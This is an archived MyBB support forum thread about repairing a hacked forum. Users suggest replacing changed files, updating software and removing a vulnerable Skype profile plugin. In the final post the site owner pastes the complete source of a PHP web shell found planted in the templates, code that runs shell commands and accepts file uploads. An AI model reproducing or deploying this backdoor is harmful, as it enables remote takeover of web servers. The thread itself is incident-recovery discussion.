MyBB Community Forums

MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 General Support > Repair after hacked ?
Full Version: Repair after hacked ?
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2

Altered

2013-01-05, 09:51 PM
My forum was hacked early this morning. I was able to put a backup of the Home Directory and MySQL Database in. The forums seem to work again but I cannot get into the admin CP. I get this 
/home/c904128/public_html/inc/languages/english/admin/virustotalscan.lang.php does not exist
When I try.

Here is my forum http://afksite.clanservers.com/index.php

I know I need to change my passwords and work obviously on some way to prevent this. Any constructive suggestions on preventing this behavior would be greatly appreciated.

UPDATE: I did get into the admin cp now. I am just a few months into MyBB and I am not sure what I need to be looking at to get it all cleaned up. I noticed I have about 3 times as many files showing Changed in the File Verification portion of the admin cp now. How do I know what is infected?

dragonexpert

2013-01-06, 06:26 PM
The best thing to do is just reupload all the files that say Changed. At least you'd be safe even if you have to remake some edits.

Mr.White

2013-01-06, 06:44 PM
....

Altered

2013-01-07, 02:02 AM
(2013-01-06, 06:26 PM)dragonexpert Wrote: [ -> ]The best thing to do is just reupload all the files that say Changed. At least you'd be safe even if you have to remake some edits.

(2013-01-06, 06:44 PM)Mr.White Wrote: [ -> ]As dragonexpert suggested, simply replace the changed files.

If you want to tighten up security, I'd suggest reading this: http://community.mybb.com/thread-131553-...53189.html

Thank you both. I have been Banning at least 2 users a day and they always seem to turn themselves into admins. Huh I even have the Registration set to Administrator Activation and they still create accounts. I will gladly start implementing changes as per the suggestions offered here.

vEconomy

2013-01-07, 06:34 AM
Check into your plugins. Skype just had a 0day which gave users instant admin access.

Also, the games plugin was recently updated so check to make sure you have the newest version.

Check into your mybb version and make sure it is up to date. Double check all your plugins.

crazy4cs

2013-01-07, 11:32 AM
(2013-01-07, 06:34 AM)vEconomy Wrote: [ -> ]Check into your plugins. Skype just had a 0day which gave users instant admin access.

Also, the games plugin was recently updated so check to make sure you have the newest version.

Check into your mybb version and make sure it is up to date. Double check all your plugins.
What Skype mod you people are talking about?
edit: This? - http://mods.mybb.com/view/user-profile-skype-id

A Google search does indicate some exploit in it.

Nebulon Ranger

2013-01-07, 12:33 PM
crazy: Yeah, ZEJ had someone point that rather nasty vulnerability out a week ago. Luckily he didn't actually want to cause any damage and just wanted to point it out to us. Toungue

Criot.

2013-01-07, 12:48 PM
If people are giving themselves instant admin access then either your being hosted off a server with absolutely no security or there's an exploit in one of your plugins.

Make sure you're running the latest version of MyBB and running all the latest versions of your plugins too.

Nebulon Ranger

2013-01-07, 02:11 PM
(2013-01-07, 12:48 PM)Criot. Wrote: [ -> ]If people are giving themselves instant admin access then either your being hosted off a server with absolutely no security or there's an exploit in one of your plugins.

Make sure you're running the latest version of MyBB and running all the latest versions of your plugins too.

Running the latest plugin versions won't help very much if, like the Skype plugin, the latest versionnhas the vulnerability and the author is nowhere to be found.

Altered

2013-01-08, 01:16 PM
I uninstalled the Skype plugin. I already uninstalled it from my server so I am not positive on the creator. I did notice there was a "x" in the input field of this plugin on these accounts. Thank you for pointing this out. My PC was down yesterday so I was trying to manage my forum off my cell. Was not the greatest method. Confused

Also I am running the 1.6.9 version of MyBB.

I ran the Check Templates under System Health and received this message "The templates below matched known security issues. Please review them." and it listed one named me.php in Global Templates. I do not see this file in the normal MyBB download. Any ideas where this came from of if it is suppose to be there? I don't have a known clean copy to compare to if it is a legit file.

Here is the code in it
<?php
error_reporting(0);set_magic_quotes_runtime(0);if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\\";}else{$s="/";}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
';}else{$lf=$lf.$f.'
';}}closedir($hr);}$form='<form action="'.$_SERVER['PHP_SELF'].'" method=get>';echo '<center><textarea cols=90 rows=20>';if($_GET['cme']){passthru($_GET['cme']);}else{echo $df.$lf;};echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'><input type=submit value=Go></form>'.$form.'Command Execute : <input name=cme size=50 value=id> <input type=submit value=eXecute></form><form action="'.$me.'" method=post enctype=multipart/form-data>Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'><input type=submit value=Send></form>iTSecTeam.com<br>Coded By Pejvak';







?>

I cant thank you guys enough for the help. I really appreciate it. Big Grin
Pages: 1 2
MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 General Support > Repair after hacked ?